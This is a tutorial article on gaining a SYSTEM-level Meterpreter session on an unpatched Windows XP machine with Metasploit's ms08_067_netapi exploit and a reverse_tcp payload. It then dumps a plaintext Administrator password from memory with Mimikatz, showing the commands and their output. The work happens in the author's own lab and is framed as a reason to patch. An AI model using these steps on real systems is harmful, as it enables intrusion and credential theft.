Metasploit: Windows Session


Jarret W. Buse

Metasploit: Windows Session

If you have been reading the previous articles, you may be wondering how to access a system and gain control of it. In this article, I will cover the process of gaining access to a Windows system.

With so many Operating Systems (OS) on a network and then Internet, there are a lot of possibilities to exploit a system. Unfortunately, as the exploits are discovered, patches and updates are made to close these security holes.

In this example, I am using a Windows XP system with only Service Pack 2 on it. I could also use Service Pack 3 with no additional patches and it would work as easily.

To find recent exploits, go to and search for the current month and year. For example, at the time of this writing I could type in “August 2015” (without the quotes) and perform the search for the newest exploits.

Before starting, realize that we are going to “exploit” a system. An exploit is making the use of a security issue to breach the system and gain access to it. Once access is gained, there are numerous things which can be done to the system. What you can do on the system will depend on the OS.

The exploit we will use is the “ms08_067_netapi” module. The exploit works by exploiting a parsing flaw in Windows XP. The fault is in the NetAPI32.dll file when using File and Printer Sharing. To check that File and Printer Sharing is enabled, look for a Windows XP system with Port 445 open. Once you find this type of system, you can start the exploit and try to exploit the system.

So, open the Metasploit Framework (MSF) and at a “msf >” prompt type “use exploit/windows/smb/ms08_067_netapi”. The prompt should change to “msf exploit(ms08_067_netapi) >” which will verify that the module was loaded. The module will attach to the Remote Host (RHOST) from your Local Host (LHOST) to the Remote Port (RPORT) 445. Once this is loaded, then type “set payload windows/meterpreter/reverse_tcp”.

Now that all the modules are loaded, it needs to be set up. Type “show options” to see what items need to be filled in to make everything work. The items you need to fill in are:

  • RHOST - IP Address of the target system
  • LHOST - IP Address of your local system with Metasploit

If you noticed, a PAYLOAD was also loaded. The PAYLOAD manages the Meterpreter Payload. The payload is done by a dll injection into the memory of the remote system. Once done, the LHOST can have full access to the Remote Host as long as the RHOST is not shut down or locks up.

On my network, the RHOST is at and the LHOST is running Metasploit.

If the Session was opened, the prompt should be “meterpreter >”. A message will also show “ Meterpreter session 1 opened” which means a session has been opened. Once the session is opened, there is much you can do with a Windows system.

One of the first things to do is find your privileges on the Windows system. Use the command “getuid” from your Metasploit system. By running this command, the result is “Server username: NT AUTHORITY\SYSTEM” showing that I have full administrative rights.

To see everything running on the LHOST, I can type “ps” to get a full listing of the LHOST processes. My output is:

Process list

PID  Name              Arch  Session  User                          Path
---  ----              ----  -------  ----                          ----
0    [System Process]                                             
4    System            x86  0        NT AUTHORITY\SYSTEM         
224  aPNdqTCcx.exe    x86  0        NT AUTHORITY\SYSTEM          C:\WINDOWS\TEMP\aPNdqTCcx.exe
236  cmd.exe          x86  0        UFO-90CF3D06518\Jarret Buse  C:\WINDOWS\system32\cmd.exe
308  explorer.exe      x86  0        UFO-90CF3D06518\Jarret Buse  C:\WINDOWS\Explorer.EXE
396  smss.exe          x86  0        NT AUTHORITY\SYSTEM          \SystemRoot\System32\smss.exe
616  csrss.exe        x86  0        NT AUTHORITY\SYSTEM          \??\C:\WINDOWS\system32\csrss.exe
640  winlogon.exe      x86  0        NT AUTHORITY\SYSTEM          \??\C:\WINDOWS\system32\winlogon.exe
692  services.exe      x86  0        NT AUTHORITY\SYSTEM          C:\WINDOWS\system32\services.exe
704  lsass.exe        x86  0        NT AUTHORITY\SYSTEM          C:\WINDOWS\system32\lsass.exe
860  VBoxService.exe  x86  0        NT AUTHORITY\SYSTEM          C:\WINDOWS\system32\VBoxService.exe
904  svchost.exe      x86  0        NT AUTHORITY\SYSTEM          C:\WINDOWS\system32\svchost.exe
980  svchost.exe      x86  0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1100  svchost.exe      x86  0        NT AUTHORITY\SYSTEM          C:\WINDOWS\System32\svchost.exe
1156  VBoxTray.exe      x86  0        UFO-90CF3D06518\Jarret Buse  C:\WINDOWS\system32\VBoxTray.exe
1188  svchost.exe      x86  0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1240  alg.exe          x86  0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
1288  svchost.exe      x86  0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
1432  spoolsv.exe      x86  0        NT AUTHORITY\SYSTEM          C:\WINDOWS\system32\spoolsv.exe
1688  wscntfy.exe      x86  0        UFO-90CF3D06518\Jarret Buse  C:\WINDOWS\system32\wscntfy.exe
1976  wuauclt.exe      x86  0        UFO-90CF3D06518\Jarret Buse  C:\WINDOWS\system32\wuauclt.exe
To see what process to which my Meterpreter Payload is attached, I can type the command “getpid”. The result of the command is “Current pid: 1100” showing I am attached to “svchost.exe”.

What if you wanted to find the user's password? It is possible to pull the password from Random Access Memory (RAM) as plain text. To do this, you need to load a Meterpreter module called Mimikatz. To load the module, type “load mimikatz”. At the prompt, type “kerberos” to see the results. If I do this on my session, I get the following:

kerberos credentials

AuthID    Package    Domain          User              Password
------    -------    ------          ----              --------
0;999    NTLM      MSHOME          UFO-90CF3D06518$
0;188183  NTLM      UFO-90CF3D06518  Jarret Buse   
0;997    Negotiate  NT AUTHORITY    LOCAL SERVICE 
0;29129  NTLM                                       
0;596715  NTLM      UFO-90CF3D06518  Administrator    HRHaggard

You can see by the results that the Administrator logged in so the password is in memory. The password is “HRHaggard” (an excellent author).

From this example, you can see there are many possibilities for exploiting a Windows system. Try it out and see what you can accomplish by using Metasploit.

Keep in mind, this is not meant to teach malicious methods. The article is to show people how simple it is to gain access to an outdated system. It is meant to teach administrators to keep a system's software up-to-date. On the other side, realize that exploits may be available for newer software which has not been patched yet. Security is an issue everywhere.

Also keep in mind that you do not need an outdated system or software with a security issue. In the next article, I will cover accessing a Linux system without using an OS or software security hole.


Members online

No members online now.